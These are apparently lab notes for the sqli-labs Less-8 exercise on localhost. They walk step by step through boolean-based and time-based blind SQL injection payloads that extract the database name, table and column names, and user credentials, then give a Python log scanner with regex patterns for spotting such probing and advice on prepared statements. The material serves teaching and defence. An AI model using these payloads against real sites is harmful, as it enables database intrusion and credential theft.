Boolean-based blind injection:
② Use length() to determine the length of the database name
http://127.0.0.1/sqli/Less-8/?id=1' and length(database()) >7 -- +
http://127.0.0.1/sqli/Less-8/?id=1' and length(database()) >8 -- +, abnormal
So the length is 8
http://127.0.0.1/sqli/Less-8/?id=1' and length(database()) =8 -- +, the page loads normally
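③ Find the first character of the current database name (the ASCII value of the database name)
?id=1' and ascii(substr(database(),1,1))>114 -- +, the page loads normally
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))>115 -- +, the page does not load
So http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))=115 -- + holds, and the ASCII value is 115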
④ Find the number of tables in the current database
http://127.0.0.1/sqli/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4 -- +, the page loads, so the number of tables is 4
⑤ Find the length of a table name
http://127.0.0.1/sqli/Less-8/?id=1' and if((select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6,sleep(5),1) -- +
limit 0,1 starts at the first row and returns one row
⑥ Find the ASCII value of a table name
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23
⑦ Find the number of columns
id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23
⑧ Find the length of a column name
http://127.0.0.1/sqli/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)<3 -- +
⑨ Find the ASCII value of a column name
id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105%23
⑩ Find the number of field values
id=1' and (select count(username) from security.users)=13%23
⑪ Find the length of the field content
http://127.0.0.1/sqli/Less-8/?id=1' and (select length(username) from security.users limit 0,1)=4 -- +
⑫ Find the ASCII value of the field content
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 -- +
Time-based blind injection:
① Find the length of the database name
id=1' and if(length(database())=8,sleep(3),1) -- +
② Find the ASCII value of the database name
id=1' and if(ascii(substr((select database()),1,1))=115,sleep(3),1) -- +
③ Find the number of tables
id=1' and if((select count(*) from information_schema.tables where table_schema='security')=4,sleep(3),1) -- +
④ Find the length of a table name
id=1' and if((select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6,sleep(3),1) -- +
⑤ Find the ASCII code of a table name
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(3),1) -- +
⑥ Find the number of columns
id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(3),1) -- +
⑦ Find the ASCII code of a column name
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(3),1) -- +
⑧ Find the number of field values
id=1' and if((select count(username) from security.users)=13,sleep(3),1) -- +
⑨ Find the field content
id=1' and if(ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68,sleep(3),1) -- +
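Seen from the server side, both techniques above leave a recognizable trail: many requests from one client whose id value closes the quote and then calls length(), ascii(substr()) or sleep(). The following is an added example, not part of the original notes, that flags that trail in an access log; the function names, the threshold, the log format (Apache common log) and the sample lines are all assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Shapes taken from the requests on this page, matched after URL-decoding.
BREAKOUT = re.compile(r"'\s*(?:and|or)\b", re.I)   # quote closes the value, a condition follows
TIME_FN = re.compile(r"\bsleep\s*\(", re.I)        # time-based oracle
PROBE_FN = re.compile(r"\b(?:ascii|substr|length|count)\s*\(|information_schema", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return 'time-blind', 'boolean-blind' or None for one decoded parameter value."""
    if not BREAKOUT.search(value):
        return None
    if TIME_FN.search(value):
        return "time-blind"
    if PROBE_FN.search(value):
        return "boolean-blind"
    return None

def scan(lines, threshold=3):
    """Count flagged requests per (client, kind); keep clients at or above threshold."""
    hits = Counter()
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                hits[(client, kind)] += 1
                break  # count each request once
    return {key: n for key, n in hits.items() if n >= threshold}

def _line(client, query):  # builds one constructed log line
    return f'{client} - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/Less-8/?id={query} HTTP/1.1" 200 512'

# Constructed sample log (not from the page): one benign client, one below threshold, two flagged.
SAMPLE_LOG = [
    _line("10.0.0.5", "1"),
    _line("10.0.0.6", "1%27+and+length(database())%3D8+--+"),
    _line("10.0.0.9", "1%27+and+length(database())%3E7+--+"),
    _line("10.0.0.9", "1%27+and+ascii(substr(database(),1,1))%3E114+--+"),
    _line("10.0.0.9", "1%27+and+ascii(substr(database(),1,1))%3D115+--+"),
    _line("10.0.0.7", "1%27+and+if(length(database())%3D8,sleep(3),1)+--+"),
    _line("10.0.0.7", "1%27+and+if(ascii(substr((select+database()),1,1))%3D115,sleep(3),1)+--+"),
    _line("10.0.0.7", "1%27+and+if((select+count(*)+from+information_schema.tables)%3D4,sleep(3),1)+--+"),
]
```

Detection of this kind only tells you the probing happened; the fix for Less-8 style code is to bind id as a parameter in a prepared statement so the quote can never end the value.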